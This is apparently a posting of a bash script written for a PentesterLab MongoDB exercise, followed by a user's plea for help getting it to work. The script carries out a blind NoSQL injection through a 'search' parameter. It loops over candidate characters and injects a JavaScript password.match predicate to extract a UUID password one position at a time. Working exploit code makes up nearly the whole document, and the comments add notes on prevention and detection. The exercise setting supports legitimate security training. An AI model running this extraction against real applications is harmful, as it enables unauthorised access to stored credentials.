mongodb noSQL injection Exercise 02 @ Pentesterlab.com
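#!/bin/bash
# Blind NoSQL injection against the "search" parameter, used to recover a
# UUID-formatted password one character at a time
# (PentesterLab MongoDB exercise 02).
# Written by r00tpgp
# 10 Dec 2018
#
# How it works: every request appends the JavaScript predicate
# this.password.match(/^.{pos}char/) to the search term. A result row in the
# response is taken as "predicate true", i.e. the candidate character is
# correct at that position.
#
# Defender notes:
#   - The predicate only runs if the application places request input inside
#     a server-side JavaScript query expression (presumably a MongoDB $where
#     clause; the server code is not shown here). Querying with field/operator
#     documents and typed input, and disabling server-side JavaScript where it
#     is not needed, removes the injection point.
#   - The traffic is easy to recognise in web logs: up to 17 requests per
#     position, each carrying "this.password.match" and a trailing %00 in the
#     query string.

# Candidate characters: lowercase hex digits plus the UUID separator.
readonly -a charset=(a b c d e f 0 1 2 3 4 5 6 7 8 9 -)

# Base URL of the lab instance (placeholder, must be filled in before use).
uri="http://xxxxxxxxx"

# A textual UUID is 36 characters (32 hex digits + 4 hyphens), so positions
# run 0..35. The earlier bound of 36 probed a 37th position that can never
# match and cost 17 wasted requests.
readonly uuid_len=36

# Initialise explicitly so a value inherited from the environment cannot leak
# into the result.
pass=""

for ((j = 0; j < uuid_len; j++)); do
  found=0
  for i in "${charset[@]}"; do
    # Data goes through %s, never through the printf format string.
    printf 'Trying... %s @ position %s \n' "$i" "$j"

    # Quoted as a whole so the shell cannot glob on '?' or split the URL;
    # the bytes sent are the same as in the unquoted form.
    url="${uri}/?search=admin'%20%26%26%20this.password.match(/^.{${j}}${i}/)%00"
    out=$(wget -qO- -- "$url" | grep -F -- '?search=')

    # Literal substring test for a result row in the returned HTML.
    if [[ "$out" == *'<tr><td><a href="?search='* ]]; then
      printf 'Found UUID char: %s \n' "$i"
      pass+=$i
      found=1
      break
    fi
  done

  # Without this check a failed position was skipped silently and every later
  # character ended up at the wrong offset in the reported value.
  if ((found == 0)); then
    printf 'No character matched at position %s; partial value: %s\n' \
      "$j" "$pass" >&2
    exit 1
  fi
done

printf 'UUID is: %s \n' "$pass"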
hi man can you check this again as even after i added the website its not running for more than 10 seconds without outcome.
please help im trying to get the UUID for 2 days with no luck